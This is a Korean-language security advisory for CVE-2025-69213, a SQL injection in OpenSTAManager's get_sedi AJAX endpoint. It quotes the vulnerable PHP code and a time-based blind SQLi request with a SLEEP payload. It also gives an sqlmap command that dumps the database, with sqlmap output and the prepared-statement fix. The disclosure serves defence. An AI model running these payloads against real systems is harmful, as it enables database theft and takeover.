
CVE-2025-69213 - OpenSTAManager의 ajax_complete.php(get_sedi 엔드포인트)에 SQL Injection 취약점이 있습니다.
| 필드 | 세부 정보 |
|---|---|
| CVE ID | CVE-2025-69213 |
| 심각도 | HIGH |
| 권고 | 권고 보기 |
| 발견자 | Lukasz Rybak |
ajax_complete.php 엔드포인트에서 get_sedi 작업을 처리할 때 SQL 인젝션 취약점이 존재합니다. 인증된 공격자는 idanagrafica 매개변수를 통해 악성 SQL 코드를 주입하여 데이터베이스에 무단으로 접근할 수 있습니다.
파일: modules/anagrafiche/ajax/complete.php:28
case 'get_sedi':
$idanagrafica = get('idanagrafica');
$q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
FROM an_sedi
WHERE idanagrafica='".$idanagrafica."' ...";
$rs = $dbo->fetchArray($q);
$_GET['idanagrafica'] → get('idanagrafica')$dbo->fetchArray($q)가 악성 쿼리를 실행수동 PoC (시간 기반 블라인드 SQLi):
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
SQLMap 익스플로잇:
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
--cookie="PHPSESSID=<session>" \
--dbms=MySQL \
--technique=T \
--level=3 \
--dump
SQLMap 출력:
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
zz_users 테이블 수정SELECT ... INTO OUTFILE을 통한 원격 코드 실행 가능직접적인 문자열 연결 대신 준비된 문(Prepared Statement)을 사용하세요:
수정 전:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
수정 후:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
발견자: Łukasz Rybak
이 CVE는 조정된 취약점 공개 절차에 따라 책임감 있게 공개되었습니다. 여기에 제공된 정보는 교육 및 방어 목적으로만 사용됩니다.